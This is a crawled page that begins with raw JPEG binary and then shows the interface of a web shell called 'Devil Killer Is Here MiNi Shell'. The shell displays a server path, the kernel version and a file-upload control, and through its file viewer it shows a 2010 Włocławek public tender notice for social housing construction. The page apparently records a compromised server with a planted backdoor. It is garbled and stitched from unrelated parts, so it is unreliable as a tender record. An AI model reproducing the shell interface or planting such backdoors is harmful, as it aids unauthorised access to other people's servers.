JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/40332-N-2010.html

<p class="kh_header"><b>Włocławek: Realizacja zadania: Mieszkania socjalne</b><br>
<b>Numer ogłoszenia: 40332 - 2010; data zamieszczenia: 12.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent  Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4144000, faks 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zadania: Mieszkania socjalne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie budynków mieszkalnych 40 rodzinnych o charakterze socjalnym wraz z obsługą w zakresie infrastruktury technicznej i komunikacji w ramach zadania pn. Realizacja zadania: Mieszkania socjalne. Teren na którym Zamawiający planuje realizować przedmiotową inwestycję dz. Nr  156na2 (budowa budynków) , 156na1 (budowa zjazdu publicznego ) obręb 0003 Krzywa Góra położona jest przy ul. Toruńskiej 168 we Włocławku.

Zakres zamówienia obejmuje:
a) sporządzenie wielobranżowej dokumentacji budowlanej dla zadania jw. z budową pięciu budynków socjalnych 40 rodzinnych wraz z niezbędną infrastrukturą techniczną i zjazdem publicznym na drogę wewnętrzną
b) uzyskanie decyzji w zakresie zatwierdzenia projektu budowlanego i udzielenia przez Prezydenta Miasta Włocławek pozwolenia na budowę dla całego zamierzenia inwestycyjnego
c) budowa dwóch budynków socjalnych 40 rodzinnych wraz niezbędną infrastrukturą techniczną w zakresie budowy zjazdu publicznego na drogę wewnętrzną do projektowanego osiedla , budowy dróg wewnętrznych, zasilania w sieć wodociągową , elektryczną z oświetleniem terenu oraz odprowadzenia ścieków sanitarnych i wód opadowych z terenu osiedla.
Zakres zamówienia: 
a) wykonanie kompletnej dokumentacji projektowej (budowlanej, wykonawczej), specyfikacji technicznej wykonania i odbioru robót (architektura i konstrukcja, zagospodarowanie terenu, inst. sanitarne, inst. elektryczne) , przedmiarem robót z podziałem na branże (budowlana, drogowa, sanitarna, elektryczne)  dla 5 budynków socjalnych z obsługą w zakresie infrastruktury technicznej i komunikacji wraz z uzgodnieniami, decyzjami (Projekt będzie wzajemnie skoordynowanej technicznie, winien posiadać stosowne opinie i uzgodnienia wymagane przepisami szczegółowymi oraz podlega obowiązkowi sprawdzenia pod względem zgodności z przepisami w tym techniczno- budowlanymi, przez osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub rzeczoznawcę budowlanego art. 20 ust. 2  Prawa budowlanego (Ustawa z dnia 7 lipca 1994 Prawo budowlane ( tekst jednolity Dz. U. Nr 207 z 2003r, poz. 2016 z późniejszymi zmianami),


Uzyskanie pozwolenia na budowę dla całego zamierzenia inwestycyjnego. 
b) wybudowanie 2 budynków socjalnych wraz z niezbędną obsługą w zakresie infrastruktury technicznej i komunikacji,
c) złożenie stosownych wniosków o udzielenie finansowego wsparcia przy tworzeniu lokali socjalnych wraz z załącznikami  (zgodnie z ustawą z dnia 8 grudnia 2006r. o finansowym wsparciu tworzenia lokali socjalnych, mieszkań chronionych, noclegowni i domów dla bezdomnych - Dz.U.06.251.1844 zpzm ;  Rozporządzeniem Ministra Budownictwa z dnia 15 marca 2007r. -  w sprawie szczegółowego trybu i terminów składania i rozpatrywania wniosku o udzielenie finansowego wsparcia na tworzenie lokali socjalnych i mieszkań chronionych, treści wniosku, kryteriów jego oceny, wzoru formularza rozliczenia udzielonego wsparcia oraz minimalnych wymagań w zakresie wyposażenia, jakie muszą spełniać pozyskane lokale mieszkalne - Dz.U.07.52.346 zpzm).

1.1. Charakterystyczne parametry określające wielkości obiektu,  zakres robót budowlanych
Zakres zamówienia obejmuje sporządzenie dokumentacji projektowej, uzyskanie pozwolenia na budowę dla całego zamierzenia inwestycyjnego (5 budynków) i wybudowanie 2 budynków wraz z infrastrukturą techniczną i komunikacyjną.

1.1.1. Opracowana dokumentacja budowlana winna uwzględniać realizację zadania w dwóch etapach:
- etap I zadania winien obejmować:
a) br. budowlanej : budowa 2 budynków socjalnych 40 rodzinnych, dwu kondygnacyjnych  - architektura oraz konstrukcja
b) br. drogowej:  budowa zjazdu publicznego na drogę wewnętrzna - działka nr 156na2, 156na1, budowa wewnętrznego układu nawierzchni utwardzonych (parkingi, chodniki, drogi  wewnętrzne), w zakresie obsługi dla projektowanych dwóch budynków
c) br. sanitarnej (wewnętrzna i zewnętrzna inst. wod.-kan.) : budowa przyłącza wodociągowego i kanalizacji sanitarnej z przepompownią ścieków , rozprowadzenie sieci kanalizacji deszczowej, kanalizacji sanitarnej i wodociągowej na terenie osiedla w zakresie zasilania dwóch budynków socjalnych ,budowa wewnętrznych instalacji sanitarnych w budynkach socjalnych,
d) br.  elektrycznej : budowa przyłącza energetycznego i stacji transformatorowej (planowana realizacja przez ENERGA w ramach umowy przyłączeniowej), oświetlenie terenu wraz z wewnętrzną instalacją elektryczną i zasilaniem przepompowni, ogrzewania w budynkach (piece akumulacyjne),
e) instalacje p.poż., odgromowa, zagospodarowanie terenu i informacja o planie bezpieczeństwa i ochrony zdrowia, budowa śmietnika (projekt, realizacja), wycinka drzew i krzewów w niezbędnym zakresie, projekt zieleni,
f) wykonanie ewentualnie dodatkowych badań geotechnicznych,
1.1.2. Budowa dwóch budynków mieszkalnych - socjalnych wraz z infrastrukturą techniczną i budową zjazdu publicznego na drogę wewnętrzną oraz przygotowaniem terenu - wycinka drzew i krzewów w niezbędnym zakresie.
W ramach realizacji zadania inwestycyjnego Mieszkania socjalne dla terenu położonego we Włocławku przy ul. Toruńskiej 168 - działka nr 156na2 w trybie zamówienia publicznego zaprojektuj - wykonaj będą realizowane roboty budowlane objęte I etapem zadania tj :
a) w zakresie robót drogowych:
- budowa zjazdu publicznego (działka nr 156na1) na drogę wewnętrzną (działką nr 156na2),
- budowa drogi dojazdowej do projektowanego osiedla w zakresie obsługi dwóch budynków socjalnych,
- budowa miejsc parkingowych i dróg wewnętrznych w zakresie obsługi dwóch budynków socjalnych,
b) w zakresie branży budowlanej:
- budowa dwóch budynków socjalnych 40 rodzinnych dwukondygnacyjnych z wyposażeniem, 
- budowa śmietnika,
c) w zakresie branży sanitarnej:
- budowa przyłącza wodociągowego z rurociągu fi150 mm w ul. Toruńskiej zgodnie z warunkami technicznymi znak TT-2231-58-10r. z dnia 14.01.2010 r. wydanymi przez Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o.
- budowa kanalizacji deszczowej w zakresie odprowadzenia wód opadowych z nawierzchni utwardzonych
- budowa przyłącza kanalizacji sanitarnej z odprowadzeniem ścieków do projektowanej kanalizacji sanitarnej fi 200 w ul. Toruńskiej wraz z przepompownią ścieków,
- budowa kanalizacji sanitarnej - osiedlowej na potrzeby I etapu zadania,
- budowa wewnętrznych instalacji wod.- kan. w budynkach mieszkalnych wraz z montażem mierników zużycia wody w każdym lokalu mieszkalnym i urządzeń w łazienkach i kuchniach,
d) w zakresie branży elektrycznej :
- budowa przyłącza energetycznego zgodnie z warunkami przyłączenia uzyskanymi przez Inwestora (zgodnie z umową przyłączeniową koszt budowy przyłącza i stacji transformatorowej pokrywa Inwestor - wystąpiono ze stosownym wnioskiem w dniu 9.02.2010r. do ENERGA OPERATORA). Inwestor jest w posiadaniu pisma Energia - Operatora S.A. znak TR-11-RW-Z-52-2009 z dnia 30.11.2009 rok dot. zapewnienia dostawy energii elektrycznej dla planowanej inwestycji Realizacja zadania Mieszkania socjalne na terenie działki nr 156na2 położonej przy ul. Toruńskiej 168 we Włocławku - zasilanie odbywać się ze stacji - działka nr 202na3, 
- budowa sieci energetycznych na terenie osiedla w zakresie podłączenia dwóch budynków i oświetlenia terenu, 
- budowa wewnętrznej instalacji elektrycznej w zakresie : oświetleniowej , montażu podgrzewaczy wody ciepłej , pieców akumulacyjnych z rozładowaniem dynamicznym i kuchni elektrycznych z piekarnikiem w każdym lokalu mieszkalnym, montażem liczników przedpłatowych na każde mieszkanie.

1.1.3.Wymagania Zamawiającego zgodnie z opracowanym programem funkcjonalno użytkowym tj.:
Technologia realizacji obiektu - tradycyjna;  Budynek dwukondygnacyjny, dach płaski dwuspadowy , kąt nachylenia połaci dachowej - do 10stopni; Budynek niepodpiwniczony; Układ mieszkań - wejścia niezależne do każdego lokalu ( I kondygnacja z zadaszonego balkony, wyposażenie mieszkań zgodnie z ustawą o dofinansowanie: 
-wymiary budynku w osiach modularnych : szerokość - 15,00 m - 2 x 7,50 m
-długość - 55,00 m - 10 x 5,50 m
-powierzchnia użytkowa lokalu mieszkalnego - 36,60 m2
-ilość lokali mieszkalnych w budynku- parter 2 x 10 lokali, I piętro 2 x 10 lokali
ogółem lokali mieszkalnych 2 x 40 = 80 I etap i 3x40=120  II etap (projektowanie bez realizacji),
-układ funkcjonalny pomieszczeń lokalu mieszkalnego: przedpokój, pokój, łazienka, wnęka kuchenna ze spiżarką.

Powierzchnia użytkowa lokalu mieszkalnego - 36,60 m2
Ilość lokali mieszkalnych - 40
Ogółem powierzchnia użytkowa jednego budynku - 1 464,00m2
Powierzchnia zabudowy jednego budynku - 825,00 m2
Kubatura - 5 333,55 m3
Inne powierzchnie: 
Powierzchnia działki nr 156na2 km 1013 - 34 544,00 m2
Powierzchnia zabudowy budynków - 4 125,00 m2
Powierzchnia dróg wewnętrznych - 3 170,00 m2
Powierzchnia dojść i chodników - 500,00 m2
Powierzchnia parkingów - 1 085,00 m2
Powierzchnia terenów zielonych - 25 664,00 m2
Zamawiający dopuszcza wielkość możliwych przekroczeń lub pomniejszeń przyjętych parametrów powierzchni, kubatur lub wskaźników na poziomie 10%.

1.1.4. Wykaz  opracowań którymi dysponuje Zamawiający:
- Program Funkcjonalno-Użytkowy opracowany 
- Wstępne Badania  geotechniczne 
- Wniosek o ustalenie lokalizacji inwestycji celu publicznego z dnia 5.02.2010r.
 -Warunki techniczne podłączenia wod-kan z dnia 14.01.2010r., 
 -Pismo Energia - Operatora S.A. znak TR-11-RW-Z-52-2009 z dnia 30.11.2009 rok dot. zapewnienia dostawy energii elektrycznej oraz wniosek do ENERGA o określenie warunków przyłączenia z dnia 9.02.2010r.,
 -Wstępne uzgodnienie przez MZD lokalizacji zjazdu publicznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9, 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 75000,00 PLN - wadium wnosi się na etapie składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiadać niezbędna wiedzę i doświadczenie wrażające się wykonaniem w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj.:
- min. 1 robota budowlana  polegająca na budowie, w systemie zaprojektuj - wybuduj budynku wielomieszkaniowego (PKOB 1122)  o wartości minimum 4.000.000,00 PLN. 
Fakt realizacji musi zostać poświadczony dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować  potencjałem kadrowym:

A) do projektowania bez ograniczeń i sprawdzania projektów architektoniczno -budowlanych - minimum po 1 osobie w specjalnościach: 
    architektonicznej, 
- konstrukcyjno-budowlanej, 
- drogowej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 

       B) dysponować potencjałem kadrowym do realizacji  - do kierowania robotami budowlanymi  bez ograniczeń  minimum po 1 osobie w specjalnościach: 
         -  konstrukcyjno-budowlanej, 
         - drogowej, 
          - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; 
        - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

Zamawiający dopuszcza wykazanie tych samych osób w zakresie pkt A i B w przypadku posiadania prze nie uprawnień do projektowania i kierowania robotami bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiadać opłaconą polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na min. 5.000.000,00 zł.,
2) posiadać przychód ze sprzedaży towarów i usług za ostatni rok obrotowy w wysokości nie mniejszej niż 10.000.000,00 zł,
3) dysponować środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 3.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu - art. 22 Pzp.
2. W przypadku wniosku składanego przez wykonawców wspólnie ubiegających się o zamówienie - dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego w ich imieniu. 3. Jeżeli wniosek oraz oświadczenia poopisywane są przez pełnomocnika - pełnomocnictwo w formie oryginału lub odpisu notarialnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
